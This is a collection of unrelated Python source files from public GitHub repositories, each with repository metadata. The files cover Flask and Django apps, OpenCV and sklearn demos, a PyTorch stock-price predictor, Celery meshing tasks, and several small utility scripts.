132621d5f6ab373ae23b1baefd99716e1277af0d | 9be8a12c1fe2dc4758f490a5bf7ca45d4d1c42ab | /KCCScripts/runFileSamplerForBackups.py | ece95704d0ed69ebd26f0154456250bf421709ec | [] | no_license | nathanwisla/PythonScriptCollection | 06e1952f2de2334fb7fe86c2897c70ed8e1c1994 | 569215b5f4360b9cfa11628c66bef21a35963908 | refs/heads/master | 2023-04-17T10:19:02.387485 | 2021-04-22T19:24:58 | 2021-04-22T19:24:58 | 180,291,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | from playground import FileSampler
import datetime
srcRoot = 'D:\\Backup\\23610009_CUS_Rogers_Network_Optimization_Program\\CA_Campaign_02\\System2\\Raw_Data'
dstRoot = 'D:\\BUDump'
date = datetime.date(2019,8,23)
print('Collecting .trp files...')
a = FileSampler(srcRoot,dstRoot,date,backup=True)
print('.trp files found!')
a.dump()
| [
"noreply@github.com"
] | nathanwisla.noreply@github.com |
b66cd2a75f8274f5c9bc8c2a4438c8fd301d226e | bd727166524fcacd93f6cdc739e9437ebd418b56 | /05_capstone/heroku_sample/models.py | ca800c5e3d6b972207d6e9696092ce5940e22b66 | [] | no_license | jmval111/full-stack-web-projects | 317af54da8bbdb0695ae007644c7dbb32ad52882 | a411741eaf04944b5d7411bc1e696ad580bd1a98 | refs/heads/master | 2023-04-20T23:33:01.025798 | 2020-09-30T12:52:25 | 2020-09-30T12:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | import os
from sqlalchemy import Column, String, create_engine, Integer
from flask_sqlalchemy import SQLAlchemy
import json
database_path = os.environ['DATABASE_URL']
db = SQLAlchemy()
'''
setup_db(app)
binds a flask application and a SQLAlchemy service
'''
def setup_db(app, database_path=database_path):
app.config["SQLALCHEMY_DATABASE_URI"] = database_path
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.app = app
db.init_app(app)
db.create_all()
'''
Person
Have title and release year
'''
class Person(db.Model):
__tablename__ = 'People'
id = Column(Integer, primary_key=True)
name = Column(String)
catchphrase = Column(String)
def __init__(self, name, catchphrase=""):
self.name = name
self.catchphrase = catchphrase
def format(self):
return {
'id': self.id,
'name': self.name,
'catchphrase': self.catchphrase} | [
"akueisara39@gmail.com"
] | akueisara39@gmail.com |
e4387b17b1c180a54707d3c99af0986563228ab2 | bdbbd34b0fb75669ac60ce1774e2484f6ef3b07c | /ch1/Mouse.py | ec83a965d465bf0905a67b82493b204d43f35d46 | [] | no_license | yuling111/opencv | 66e96f1c753dd43111bcd9cc09c93ae220bf13e8 | a017434aba3b64e4663a11bfeefa3f33e5958632 | refs/heads/master | 2023-06-25T12:56:49.435972 | 2021-07-30T09:47:19 | 2021-07-30T09:47:19 | 389,839,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | import numpy as np
import cv2 as cv
# 鼠标回调函数
def draw_circle(event,x,y,flags,param):
if event == cv.EVENT_LBUTTONDBLCLK:
cv.circle(img,(x,y),10,(255,0,0),-1)
elif event == cv.EVENT_RBUTTONDOWN:
cv.rectangle(img, (x,y), (x+50,y+5), (0,0,255),3)
# 创建一个黑色图像,一个窗口,然后和回调绑定
img = np.zeros((512,512,3), np.uint8)
cv.namedWindow('image')
#抓滑鼠的動作cv.setMouseCallback(視窗, 要做什麼動作(觸發哪個funtion))
cv.setMouseCallback('image',draw_circle)
while(1):
cv.imshow('image',img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows() | [
"waini1023@gmail.com"
] | waini1023@gmail.com |
bb02dddbd6ef8c599eda31ca5a6d7365c3f4b787 | 636ba2700eaf3a151b73144b510f38c75ab1919d | /ml/m11_kfold_estimators2_cancer.py | 83c224be41b0db487d18733b67d449cc86ebf928 | [] | no_license | Taerimmm/ML | 17997f388e18c28dfd9de83af98a6d4bebe7e1f0 | 6147cede81ebcc95f21adebf75731fbbb11edfab | refs/heads/master | 2023-06-10T14:26:45.335219 | 2021-07-05T15:30:47 | 2021-07-05T15:30:47 | 324,874,959 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | from sklearn.model_selection import train_test_split, KFold, cross_val_score
from sklearn.metrics import accuracy_score
from sklearn.utils import all_estimators
from sklearn.datasets import load_breast_cancer
import warnings
warnings.filterwarnings('ignore')
dataset = load_breast_cancer()
x = dataset.data
y = dataset.target
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)
kfold = KFold(n_splits=5, shuffle=True)
import sklearn
print(sklearn.__version__) # 0.23.2
# all_estimators -> 0.20 에 최적화되어있다.
allAlgorithms = all_estimators(type_filter='classifier') # sklearn의 분류형 모델 전체
# print(allAlgorithms)
for (name, algorithm) in allAlgorithms:
try :
model = algorithm()
scores = cross_val_score(model, x_train, y_train, cv=kfold) # cv=5 도 가능 / 이때 shuffle=False
print(name, '의 정답율 :\n', scores)
except :
# continue
print(name, '은 없는 놈') # 0.23.2 에 없는 algorithm
# 기준이 되는 지표로 삼을 수 있다.
| [
"xofla7560@naver.com"
] | xofla7560@naver.com |
11b20acbca4a4bd934ba49818f71c81446229c4e | 888c8c1e251b99b582ab9080ea10924c30a7b7a1 | /modules/reminder.py | 43e2ee4ceb4ef161ad657c73ffe9b2edfaa553fe | [] | no_license | lijianzwm/step-everyday | e4385a538c32bbfef6b93f631fb70777bdbe89f5 | 719fad41a330882d65a52947271cf36f71e7d3fc | refs/heads/master | 2021-01-01T17:48:53.569473 | 2017-09-12T05:25:05 | 2017-09-12T05:25:05 | 98,161,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | # -*- coding:utf-8 -*-
"""定时提醒模块"""
import datetime
from modules.db import DB
from modules.mail import MailBox
from config import Config
from modules.mail import MailSender
class Reminder:
interval = [1, 2, 7, 14, 30, 90] # 时间间隔,单位是天
def __init__(self):
pass
def _review_date(self):
dt = []
today = datetime.date.today()
for d in self.interval:
dt.append((today-datetime.timedelta(days=d)).strftime('%Y-%m-%d'))
return dt
def _generate_review_note(self):
"""整成复习笔记,返回dict"""
dt_list = self._review_date()
user_email = Config.RECEIVE_LIST
review_note = {}
for email in user_email:
with DB() as db:
merged_content = "\n\n\n".join(db.select_content(dt_list=dt_list, email=email))
review_note[email] = merged_content
return review_note
def remind(self):
email2note = self._generate_review_note()
title = datetime.date.today().strftime('%Y-%m-%d')+"复习内容"
with MailSender() as box:
for addr, note in email2note.items():
box.send(addr, title, note)
def fetch(self):
with MailBox() as mb:
mail_list = mb.receive()
mb.save(mail_list)
mb.delete()
| [
"lijian8931@163.com"
] | lijian8931@163.com |
43b64d2dd71ecb0c76c663205e0bfac8317835b3 | 315af6a46b15e6eff887ae37aff9737286dfc1d8 | /celuchop2/urls.py | 07ce8135356e2dd5919b4260caeaf5b93a90a397 | [] | no_license | andresx213/clase | b5c8c9b1f2fc4d9fdda180dcfd825f639085d676 | 1d27456e3ef236e2764f363cd3cacd783a69ca7e | refs/heads/master | 2022-11-29T19:38:25.918295 | 2020-08-10T19:52:18 | 2020-08-10T19:52:18 | 286,567,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | """celuchop2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('admin/', admin.site.urls),
path('tienda/',include('apps.tienda.urls')),
path('apellido/',include('apps.maintenance.urls'))
]
| [
"andresortega2015@gmail.com"
] | andresortega2015@gmail.com |
b73865ffa809ff7d0b2a4617221883370eeb59a5 | ca23ecd39c84a42879dbb35f2dbae09cb62db750 | /simulators/switch_matrix/__init__.py | 5d8ddd9aebedc7fc4f0c7bfc9fdcabb65b18fbed | [] | no_license | discos/simulators | 41753cd38f732914a7727fa8663b3c467c68bbbe | 5d5db291939b75ec07253c203b103fd9f515fbd2 | refs/heads/master | 2023-07-21T06:40:08.071685 | 2023-07-10T13:32:09 | 2023-07-10T13:32:09 | 96,300,452 | 5 | 0 | null | 2023-09-08T13:36:07 | 2017-07-05T09:11:41 | Python | UTF-8 | Python | false | false | 2,339 | py | # Author:
# Lorenzo Monti <lorenzo.monti@inaf.it>
import re
from socketserver import ThreadingTCPServer
from simulators.common import ListeningSystem
servers = [
(('0.0.0.0', 13200), (), ThreadingTCPServer, {}),
]
class System(ListeningSystem):
commands = {
'set IF_switch_config': 'set_IF_switch_config',
'get IF_switch_config': 'get_IF_switch_config',
}
tail = '\r\n'
ack = 'ACK'
nack = 'NACK'
def __init__(self):
self._set_default()
self.sw_matrix = SwitchMatrix()
def _set_default(self):
self.msg = ''
def parse(self, byte):
if byte == '\n': # Ending char
msg = self.msg
self._set_default()
return self._parse(msg)
else:
self.msg += byte
return True
def _parse(self, msg):
commandList = msg.replace("\r", "").split(';')
answer = ''
for command in commandList:
args = re.split(r'\W+', command)
if len(args) < 2:
continue
cmd_name = self.commands.get(args[0] + " " + args[1])
if len(args) > 2: # set methods
answer = getattr(self, cmd_name)(args[2])
return answer
method = getattr(self, cmd_name) # get methods
ans = method()
if isinstance(ans, str):
answer += ans + ';'
if answer:
answer = answer[:-1]
return answer
else:
return True
def set_IF_switch_config(self, params):
self.sw_matrix.switch_matrix = int(params)
return self.ack + self.tail
def get_IF_switch_config(self):
return self.sw_matrix.switch_matrix + self.tail
class SwitchMatrix:
def __init__(self):
self._switch_matrix = 1
self._matrix = {
1: [False, True, False, "H LSB", "H USB", "HBS"],
2: [False, False, True, "V LSB", "V USB", "VBS"],
3: [True, True, False, "H LSB", "V LSB", "LBP"],
4: [True, False, True, "H USB", "V USB", "UBP"],
}
@property
def switch_matrix(self):
return f'{self._switch_matrix}:{self._matrix[self._switch_matrix][-1]}'
@switch_matrix.setter
def switch_matrix(self, value):
self._switch_matrix = value
| [
"noreply@github.com"
] | discos.noreply@github.com |
54e9459c1b681d912fbe6e5ccad6d73b8cc6d3e8 | 0ff483891f3b0008b0384f95d1045e635934fa37 | /pre_kakao.py | 9400f3159bee5dff96263208ca4616277dcb7767 | [] | no_license | wjb127/predict_stock_price | 0646475c090f4ca931d45a62da95f80d1120704e | d44f157cb46d2366911c71bea54d697fe9cd0be8 | refs/heads/master | 2023-06-12T00:12:28.265197 | 2021-07-06T02:12:48 | 2021-07-06T02:12:48 | 383,311,540 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,410 | py | import torch
from torchvision import transforms, datasets
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import style
import pandas as pd
import os
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
# 랜덤 시드값
torch.manual_seed(77)
# 활성화 함수
def sigmoid(x):
return torch.div(torch.tensor(1.0), torch.add(torch.tensor(1.0), torch.exp(torch.negative(x))))
def sigmoid_prime(x):
return torch.mul(sigmoid(x), torch.subtract(torch.tensor(1.0), sigmoid(x)))
def sigmoid_inverse(x):
return torch.negative(torch.log(torch.sub(torch.div(torch.tensor(1.0),x),torch.tensor(1.0))))
# 기울기 저장하는 파일
#FILE_NAME = 'gradient.txt'
#f = open(FILE_NAME, 'w')
# 트레이닝 데이터
df = pd.read_excel('train/train_kakao.xlsx')
data2 = np.array(df)
#print(len(data2[0]))
# 인공신경망의 인풋 아웃풋
# 길이 그대로 가져오기
datalen = len(data2[0])
outputlen = 351
# 인풋과 레이블 설정
X = []
Y = []
for i in range(0,datalen - 9):
X.append(data2[0][i:i+9])
Y.append(data2[0][i+9])
X = [np.array(X)]
dtype = torch.float32
D_in, H, D_out = 9, 400, outputlen
try:
w1re = pd.read_excel('wbdata/w1_kakao.xlsx', index_col=None)
w1np = np.array(w1re)
w1ts = torch.Tensor(w1np)
w2re = pd.read_excel('wbdata/w2_kakao.xlsx', index_col=None)
w2np = np.array(w2re)
w2ts = torch.Tensor(w2np)
b1re = pd.read_excel('wbdata/b1_kakao.xlsx', index_col=None)
b1np = np.array(b1re)
b1ts = torch.Tensor(b1np)
b2re = pd.read_excel('wbdata/b2_kakao.xlsx', index_col=None)
b2np = np.array(b2re)
b2ts = torch.Tensor(b2np)
# A weight and a bias for input nodes
w1 = w1ts
b1 = b1ts
# A weight and a bias for hidden nodes
w2 = w2ts
b2 = b2ts
if(w1.shape != torch.randn(D_in, H, dtype=dtype, requires_grad=True).shape or b1.shape != torch.randn(1, H, dtype=dtype, requires_grad=True).shape
or w2.shape != torch.randn(H, D_out, dtype=dtype, requires_grad=True).shape or b2.shape != torch.randn(1, D_out, dtype=dtype, requires_grad=True).shape):
raise Exception
# print(w1.shape == torch.randn(D_in, H, dtype=dtype, requires_grad=True).shape)
# print(b1.shape)
# print(w2.shape)
# print(b2.shape)
# print(torch.randn(D_in, H, dtype=dtype, requires_grad=True).shape)
except:
# A weight and a bias for input nodes
w1 = Variable(torch.randn(D_in, H, dtype=dtype, requires_grad=True)) * np.sqrt(1. / D_in)
b1 = Variable(torch.randn(1, H, dtype=dtype, requires_grad=True)) * np.sqrt(1. / D_in)
# A weight and a bias for hidden nodes
w2 = Variable(torch.randn(H, D_out, dtype=dtype, requires_grad=True)) * np.sqrt(1. / H)
b2 = Variable(torch.randn(1, D_out, dtype=dtype, requires_grad=True)) * np.sqrt(1. / H)
full_epoch = 100
learning_rate = 0.1
for epoch in range(full_epoch):
corrects = 0
for i in range(0,datalen - 9):
x = torch.Tensor([X[0][i]])
y = np.array([Y[i]])
new_y = y + (outputlen-1)//2
y_onehot = torch.zeros((1, outputlen))
# new_y 영역이 벗어나는 경우 처리 필요
y_onehot[0, new_y] += 1
z1 = torch.add(torch.mm(x, w1), b1)
a1 = sigmoid(z1)
z2 = torch.add(torch.mm(a1, w2), b2)
a2 = sigmoid(z2)
diff = a2 - y_onehot
# backward pass
d_z2 = torch.mul((a2 - y_onehot), sigmoid_prime(z2))
d_b2 = torch.mul((a2 - y_onehot), sigmoid_prime(z2))
#print(diff.shape,sigmoid_prime(z2).shape)
d_w2 = torch.mm(torch.transpose(a1, 0, 1), torch.mul((a2 - y_onehot), sigmoid_prime(z2)))
d_a1 = torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1))
d_z1 = torch.mul(torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1)),
sigmoid_prime(z1))
d_b1 = torch.mul(torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1)),
sigmoid_prime(z1))
d_w1 = torch.mm(torch.transpose(x, 0, 1),
torch.mul(torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1)),
sigmoid_prime(z1)))
# weight update
w1 -= learning_rate * d_w1
w2 -= learning_rate * d_w2
b1 -= learning_rate * d_b1
b2 -= learning_rate * d_b2
amaxa2 = torch.argmax(a2).numpy()
yt = torch.Tensor(new_y)
ytt = int(yt.numpy()[0])
if amaxa2 == ytt:
corrects += 1
#if i % 10000 == 0:
print("Epoch {}: {}/{}".format(epoch + 1, i+1, datalen - 9),end="")
if amaxa2 != ytt:
print(" Error!")
else:
print()
print("Epoch {}, Accuracy: {:.3f}".format(epoch + 1, corrects / (datalen - 9) ))
#if(corrects / len(data2) == 1):
#print(w1,w2,b1,b2)
raw = pd.DataFrame(np.array(w1))
raw.to_excel(excel_writer='wbdata/w1_kakao.xlsx',index=None)
raw = pd.DataFrame(np.array(w2))
raw.to_excel(excel_writer='wbdata/w2_kakao.xlsx',index=None)
raw = pd.DataFrame(np.array(b1))
raw.to_excel(excel_writer='wbdata/b1_kakao.xlsx',index=None)
raw = pd.DataFrame(np.array(b2))
raw.to_excel(excel_writer='wbdata/b2_kakao.xlsx',index=None)
df2 = pd.read_excel('test/test_kakao.xlsx')
data3 = np.array(df2)
X2 = []
X2.append(data3[0][0:datalen-1])
X2 = [np.array(X2)]
x2 = torch.Tensor([X2[0][0]])
for i in range(0,5):
# 다음을 예측해야할 9일간의 주가 데이터
print(np.array(x2[0]))
# 신경망 구성
z1 = torch.add(torch.mm(x2, w1), b1)
a1 = sigmoid(z1)
z2 = torch.add(torch.mm(a1, w2), b2)
a2 = sigmoid(z2)
# 결과 레이블
if(torch.sum(a2[0][0:(outputlen)//2 - 1]) < torch.sum(a2[0][(outputlen)//2 + 1:outputlen-1])):
print("상승")
elif torch.sum(a2[0][0:(outputlen)//2 - 1]) > torch.sum(a2[0][(outputlen)//2 + 1:outputlen-1]):
print("하락")
else:
print("횡보")
print("상승 확률 : ", round(float(100 * torch.sum(a2[0][(outputlen) // 2 + 1:outputlen]) / torch.sum(a2)), 2))
print("하락 확률 : ", round(float(100 * torch.sum(a2[0][0:(outputlen) // 2]) / torch.sum(a2)), 2))
print("횡보 확률 : ", round(float(100 * torch.sum(a2[0][(outputlen) // 2 ]) / torch.sum(a2)), 2))
# 결과물의 최대값 보기 = 의미하는 값
amaxa2 = torch.argmax(a2).numpy()
# 계산 결과물 : print(a2)
# 예측 결과
print("주가 변화 : ",amaxa2 - outputlen//2)
print()
x2 = list(x2[0])
del x2[0]
x2.append(torch.Tensor([amaxa2 - (outputlen)//2]))
x2 = [x2]
x2 = torch.Tensor(x2)
# x2 = [x2]
# x2 = torch.Tensor(x2)
# #print(x2)
# # 신경망 구성
# z1 = torch.add(torch.mm(x2, w1), b1)
# a1 = sigmoid(z1)
# z2 = torch.add(torch.mm(a1, w2), b2)
# a2 = sigmoid(z2)
# 결과 레이블
# if (torch.sum(a2[0][0:(outputlen) // 2 - 1]) < torch.sum(a2[0][(outputlen) // 2 + 1:outputlen - 1])):
# print("2차 상승 확률", round(float(100 * torch.sum(a2[0][(outputlen) // 2 + 1:outputlen - 1]) / torch.sum(a2)), 2))
# elif torch.sum(a2[0][0:(outputlen) // 2 - 1]) > torch.sum(a2[0][(outputlen) // 2 + 1:outputlen - 1]):
# print("2차 하락 확률", round(float(100 * torch.sum(a2[0][0:(outputlen) // 2 - 1]) / torch.sum(a2)), 2))
# else:
# print("2차 횡보")
#
# # 결과물의 최대값 보기 = 의미하는 값
# amaxa2 = torch.argmax(a2).numpy()
#
# # 계산 결과물 : print(a2)
# # 예측 결과
# print("주가 변화 : ",amaxa2 - (outputlen) // 2)
# 학습지식 정리
# 이상적인 0부터 60까지 레이블에 역함수 적용
# 시그모이드 역함수 : z1 = sigmoid_inverse(x)
# b2 빼고 w2의 역행렬 곱하기
# 시그모이드 역함수
# b1 빼고 w1 역행렬 곱하기
###############################################################################
# U2, s2, V2 = np.linalg.svd(w2, full_matrices = True)
# S2 = np.zeros(w2.shape)
# for i in range(len(s2)):
# S2[i][i] = s2[i]
# w2in = torch.Tensor(np.dot(U2, np.dot(S2, V2)))* np.sqrt(1. / U2.shape[0])
#
# U1, s1, V1= np.linalg.svd(w1, full_matrices = True)
# S1 = np.zeros(w1.shape)
# for i in range(len(s1)):
# S1[i][i] = s1[i]
# w1in = torch.Tensor(np.dot(U1, np.dot(S1, V1)))* np.sqrt(1. / U1.shape[0])
#
#
# x = torch.zeros((1,outputlen))
#
# x += 0.01
# x[0,outputlen-1] += 0.98
# #print(a2)
#
# x = a2
# #print(x)
# z1 = sigmoid_inverse(x)
# #print(z1)
# a1 = torch.mm(torch.sub(z1,b2),torch.transpose(w2in,0,1))
# #print(a1)
# z2 = sigmoid_inverse(a1)
# #print(z2)
# a2 = torch.mm(torch.sub(z2,b1),torch.transpose(w1in,0,1))
#amaxa2 = torch.argmax(a2).numpy()
#print(x)
#print(a2)
#print(amaxa2 - outputlen // 2)
###############################################################################
bq = []
for k in range(0,outputlen):
x = torch.zeros((1,outputlen))
x += 0.01
x[0,k] += 0.98
#print(a2)
#x = a2
#print(k,end=" : ")
z1 = sigmoid_inverse(x)
a1 = torch.mm(z1, torch.transpose(w2,0,1))
a1 -= np.min(np.array(a1))
a1 /= np.max(np.array(a1))
a1 *= 0.98
a1 += 0.01
z2 = sigmoid_inverse(a1)
a2 = torch.mm(z2, torch.transpose(w1,0,1))
a2 -= np.min(np.array(a2))
a2 /= np.max(np.array(a2))
a2 *= 0.98
a2 += 0.01
#amaxa2 = torch.argmax(a2).numpy()
#print(x)
bq.append(np.array(a2[0]))
#print(np.array(a2[0]))
raw = pd.DataFrame(np.array(bq))
raw.to_excel(excel_writer='bqdata/backquery_kakao.xlsx', index=None)
# for j in range(0,len(a2[0])):
#
# print('%6s' %format(np.array(a2[0][j]),'.3'),end=" ")
# print()
#print(amaxa2 - outputlen // 2)
###############################################################################
# x2 = torch.Tensor([X2[0][0]])
# z1 = torch.add(torch.mm(x2, w1ts), b1ts)
# a1 = sigmoid(z1)
# z2 = torch.add(torch.mm(a1, w2ts), b2ts)
# a2 = sigmoid(z2)
#
# amaxa2 = torch.argmax(a2).numpy()
# print(x2)
# print(amaxa2 - (outputlen - 1) / 2)
# 아웃풋 파일에 쓰기
# f.write(str(w1))
# f.write("\n")
# f.write(str(b1))
# f.write("\n")
# f.write(str(w2))
# f.write("\n")
# f.write(str(b2))
# f.write("\n")
# f.close() | [
"wjb127@naver.com"
] | wjb127@naver.com |
00c75c7761a99938db0045e90ef7b8228a83fa45 | 9c2a72534a269f7aa5f8106de0657f49112c92e3 | /upper.py | c0b16d59796da79b7395ffe4754812ead93f75a2 | [] | no_license | TonySteven/Python | 40f02d25ac3f8e3c81754828c826eb4229d6d71b | 567216212aedc546ea5583070e3664cd58046344 | refs/heads/master | 2023-08-17T20:36:07.111444 | 2023-08-07T10:13:35 | 2023-08-07T10:13:35 | 38,110,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2018/7/27 10:40
# @Author : StevenL
# @Email : stevenl365404@gmail.com
# @File : UUID.py
a = input("请输入字符:")
b = []
for n in a :
if "a"<= n <= "z":
b.append(n.upper())
# elif"A" <= n <= "Z" :
# b.append(n.lower())
elif n == " " :
b.append('_')
else:
b.append(n)
print("".join(b))
| [
"stevenl365404@gmail.com"
] | stevenl365404@gmail.com |
b1b4ec5b7ef30c526700e6d6dd317d13cb72b24e | 377ac4d28db18b3f24d4046e58564c11a0a4cb29 | /tasks.py | d21fa4d277de8991a098b176fe81bc5b9594ad7a | [] | no_license | sotchatzi/ACC-7 | 24b34d03ce58075fc56f6fd553f1e3acab3f1330 | cf51ec13975c48136b20066e0a69c4674f91e510 | refs/heads/main | 2023-01-01T01:45:31.192963 | 2020-10-23T10:58:21 | 2020-10-23T10:58:21 | 303,402,715 | 0 | 1 | null | 2020-10-20T16:45:20 | 2020-10-12T13:35:35 | Python | UTF-8 | Python | false | false | 1,327 | py | import subprocess
import pandas as pd
from glob import glob
from celery import Celery
app = Celery('tasks', broker='amqp://js:js@192.168.2.162/jsvhost', backend='redis://:js@192.168.2.162/0', task_track_started=True)
WORK_DIR = '/home/fenics/shared/murtazo'
GMSH_DIR = WORK_DIR + '/cloudnaca'
AIRFOIL_DIR = WORK_DIR + '/navier_stokes_solver'
@app.task
def test():
return "this is a test"
@app.task
def airfoil_task(angle, n_nodes, n_levels, speed, time):
mesh_xml_file = f'{GMSH_DIR}/msh/r{n_levels}a{angle}n{n_nodes}.xml'
if not glob(mesh_xml_file):
subprocess.run(
f'{GMSH_DIR}/runme.sh {angle} {angle} 1 {n_nodes} {n_levels}',
shell=True, cwd=GMSH_DIR)
subprocess.run(
f'dolfin-convert {GMSH_DIR}/msh/r{n_levels}a{angle}n{n_nodes}.msh {mesh_xml_file}',
shell=True, cwd=GMSH_DIR)
subprocess.run(
f'{AIRFOIL_DIR}/airfoil 0 0.0001 {speed} {time} {mesh_xml_file}',
shell=True, cwd=AIRFOIL_DIR)
forces = pd.read_csv(f'{AIRFOIL_DIR}/results/drag_ligt.m', sep='\t')
return {'angle': angle, 'n_nodes': n_nodes, 'n_levels': n_levels, 'speed': speed, 'time': time,
'lift': list(forces.lift), 'drag': list(forces.drag)}
def get_task(task_id):
res = airfoil_task.AsyncResult(task_id, app=app)
return res
| [
"g478551654@gmail.com"
] | g478551654@gmail.com |
6576e116871b8d685309cd0229812abdd8c309f9 | 53f808dbd19355abf25fe7f000958dffa31593ce | /price/admin.py | daaf6a1e9c8c5e16ce0c40f93db02c1531de1f23 | [] | no_license | qurg/chain | f43df017d75b52c1baf43ebad913db0e881f4747 | 1a969acfe601d57ade22b912c4028ee07c82363d | refs/heads/master | 2020-05-29T21:46:11.413607 | 2019-06-14T00:55:18 | 2019-06-14T00:55:18 | 189,391,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,256 | py | import time
from django.contrib import admin
from django.contrib.admin import ModelAdmin
# Register your models here.
from price.adminForms import InquireForm, QuoteForm
from price.models import Inquire, Quote
class QuoteAdmin(admin.StackedInline):
model = Quote
form = QuoteForm
fieldsets = (
(None, {'fields': (('supplier',),
('airline', 'airline_date'),
('airline_remark', 'airline_times'),
('weight_class', 'cost',),
('net_rate', 'fuel_rate', 'security_rate', 'truck_rate',
'total_rate',),
('dim', 'cut_share',),
('trans_route', 'trans_time',),
'quote_remark',
)}),
)
autocomplete_fields = ['supplier', ]
extra = 0
@admin.register(Inquire)
class InquireAdmin(ModelAdmin):
form = InquireForm
list_display = ['id', 'customer', 'depart', 'destination', 'carton', 'weight', 'volume']
fieldsets = (
(None, {'fields': (('customer', 'contact',),
('depart', 'destination', 'cargo_ready'),
)}),
('货物信息', {'fields': (('carton', 'weight', 'volume',),
('goods', 'airline_require',),
('trans_time', 'remark',),
)}),
)
autocomplete_fields = ['customer', 'contact']
inlines = [QuoteAdmin, ]
def save_model(self, request, obj, form, change):
obj.create_by = request.user
obj.created = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
return super(InquireAdmin, self).save_model(request, obj, form, change)
def save_formset(self, request, form, formset, change):
if formset.model != Quote:
return super(InquireAdmin, self).save_formset(request, form, formset, change)
instances = formset.save(commit=False)
for instance in instances:
instance.created_by = request.user
instance.created = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
instance.save()
formset.save_m2m()
| [
"qurg@outlook.com"
] | qurg@outlook.com |
f781104f0fd71fcc98d41aeec72b8325ec220ab3 | 8d0fc0a476f7de69e4dad9c7279e379eb67d3dba | /OpenGL/Geometry/PointCloudTest.py | c25b7096824f9f7ad4d57c950c1a5e088e7c4592 | [] | no_license | coderbyheart/hsrm-mi-cg | 485996c6361e4b96f149efb5120e1f5fb5ea3004 | 1c6ff5e94eb6e821798975cd970e3247a488c171 | refs/heads/master | 2021-01-23T18:49:43.876739 | 2012-01-30T16:09:41 | 2012-01-30T16:09:41 | 2,681,057 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,541 | py | # -*- coding: utf-8 -*-
import unittest
from PointCloud import PointCloud
class PointCloudTest(unittest.TestCase):
"""Unittests für PointCloud"""
def test_wuerfel5(self):
pc = PointCloud()
pc.readRaw('data/wuerfel5_points.raw')
bb = pc.getBoundingBox()
self.assertEqual(5.0, bb['x'])
self.assertEqual(5.0, bb['y'])
self.assertEqual(0.0, bb['z'])
self.assertEqual(0.0, bb['-x'])
self.assertEqual(0.0, bb['-y'])
self.assertEqual(-5.0, bb['-z'])
self.assertEqual(5.0, pc.getXSize())
self.assertEqual(5.0, pc.getYSize())
self.assertEqual(5.0, pc.getZSize())
def test_wuerfel_normalize(self):
#for file in ['data/line_points.raw']:
for file in ['data/wuerfel5_points.raw', 'data/wuerfel5-allpos_points.raw', 'data/wuerfel5-allneg_points.raw', 'data/wuerfel10_points.raw']:
pc = PointCloud()
pc.readRaw(file)
pcn = pc.normalized()
bb = pcn.getBoundingBox()
self.assertEqual(1.0, bb['x'])
self.assertEqual(1.0, bb['y'])
self.assertEqual(1.0, bb['z'])
self.assertEqual(-1.0, bb['-x'])
self.assertEqual(-1.0, bb['-y'])
self.assertEqual(-1.0, bb['-z'])
self.assertEqual(2.0, pcn.getXSize())
self.assertEqual(2.0, pcn.getYSize())
self.assertEqual(2.0, pcn.getZSize())
if __name__ == '__main__':
unittest.main() | [
"m@tacker.org"
] | m@tacker.org |
3efab5071a2ea200eb632218546c7f35d498b77e | 44431ab9299367df80667fc5e7b38c0dd916bf98 | /Django/mainRandomWordGenerator/mainRandomWordGenerator/settings.py | 8ca379a0bc589320e2f8cb692bb54f6835fb9728 | [] | no_license | isoetandar/DojoAssignments | 14df2b0cefe08be8f39975c6ffa1a617dfba243c | ef4e6d75b77d69ccffc0eca91e9083e6e034d4dd | refs/heads/master | 2020-03-11T15:33:04.825745 | 2018-07-06T00:41:32 | 2018-07-06T00:41:32 | 130,087,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,225 | py | """
Django settings for mainBlog project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7j++v+jf2nd9$)%6-%a*s-2^-aetupv%jvwpnz@v1dnkxi(38v'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
